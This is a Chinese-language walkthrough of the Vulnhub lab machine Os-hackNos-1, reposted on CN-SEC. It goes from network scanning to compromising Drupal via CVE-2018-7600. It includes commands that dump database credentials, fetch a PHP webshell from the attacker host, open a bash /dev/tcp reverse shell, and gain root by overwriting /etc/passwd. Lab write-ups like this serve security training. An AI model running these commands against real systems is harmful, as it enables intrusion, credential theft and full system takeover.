【Vulnhub】靶机OS-HACKNOS

admin 2022年1月10日03:33:39安全博客评论14 views3486字阅读11分37秒阅读模式

前言

  • 第一次玩Vulnhub,只记录使用命令和一些感想,还有踩坑记录

Os-HackNos-1配置

首先介绍一下靶机,靶机是 vulnhub Os-hackNos-1

简介: 难度容易到中, flag 两个 一个是普通用户的user.txt 另外一个是root用户的user.txt

靶机的地址:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/

有的靶机可能打开无法获取IP,我们需要使用方法来进入到靶机内,修改信息。

1、导入到了虚拟机之后,会出现无法获取ip的情况,我们自己调,开启HackNos的同时连按shift键,按e进入页面

image-20210919160755067

3、将这里的ro修改为rw single init=/bin/bash,然后按ctrl+x,进入root操作页面

image-20210919160925088

4、查ip a发现查不到,记住网卡的名称ens33,准备修改配置信息

image-20210919161030226

5、vim /etc/network/interfaces 看一下配置信息用的是哪一个网卡,把这两个都改成 ens33

image-20210919161105212

6、然后/etc/init.d/networking restart 重启网卡服务 enp0s3

image-20210919161139706

7、最后按ctrl+alt+del,进行重启,就ok了

Os-HackNos-1开始

1、可以用两种方法确认靶场的存在,扫ip

1
2
netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

1
nmap -sV -sC -A 192.168.1.108

3、扫目录情况

1
2
3
gobuster dir -u http://192.168.1.108/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 

dirb http://10.0.2.4

4、根据下载drupal的cms来试着看其版本

1
http://192.168.1.108/drupal/CHANGELOG.txt

5、通过cms版本搜一下exp

1
2
CVE-2018-7600
git clone https://github.com/pimps/CVE-2018-7600

6、有一个远程REC利用exp拿下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
python3 drupa7-CVE-2018-7600.py http://192.168.1.108/drupal/ 
查看数据库
python3 drupa7-CVE-2018-7600.py http://192.168.1.108/drupal/ -c "cd sites/default;ls;cat settings.php"


获得
* Database configuration format:
* @code
* $databases['default']['default'] = array(
* 'driver' => 'mysql',
* 'database' => 'databasename',
* 'username' => 'username',
* 'password' => 'password',
* 'host' => 'localhost',
* 'prefix' => '',
* );
* $databases['default']['default'] = array(
* 'driver' => 'pgsql',
* 'database' => 'databasename',
* 'username' => 'username',
* 'password' => 'password',
* 'host' => 'localhost',
* 'prefix' => '',
* );
* $databases['default']['default'] = array(
* 'driver' => 'sqlite',
* 'database' => '/path/to/databasefilename',
* );
* @endcode
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'cuppa',
'username' => 'cuppauser',
'password' => '[email protected]',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);

也可以对其目录进行扫描

1
2
3
gobuster dir -u http://192.168.1.108/drupal -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

dirsearch -u 192.168.1.108 -e* -x 403

7、利用python搭建服务器,让其下载木马,就可以上线webshell了

1
2
3
python -m SimpleHTTPServer 

python3 drupa7-CVE-2018-7600.py http://192.168.1.108/drupal/ -c "wget http://192.168.1.105:8000/gylq.php"

8、反弹shell

1
bash -c 'exec bash -i &>/dev/tcp/192.168.1.105/6666 0>&1'

9、解密得出james:[email protected]

1
2
echo "KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==" | base64 -d
<T4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==" | base64 -d

10、suid提权

利用制作一个ssl密码

1
2
3
openssl passwd -1 -salt gylq 123456
输出
$1$gylq$/LTjhHmiHp0tpo66ocv2e/

将其更改为下列形式,用wget替换

1
gylq:$1$gylq$/LTjhHmiHp0tpo66ocv2e/:0:0:root:/root:/bin/bash
1
wget http://192.168.1.105:8000/passwd -O /etc/passwd

接着用su gylq来登陆就是root权限了

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:33:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【Vulnhub】靶机OS-HACKNOS http://cn-sec.com/archives/730024.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: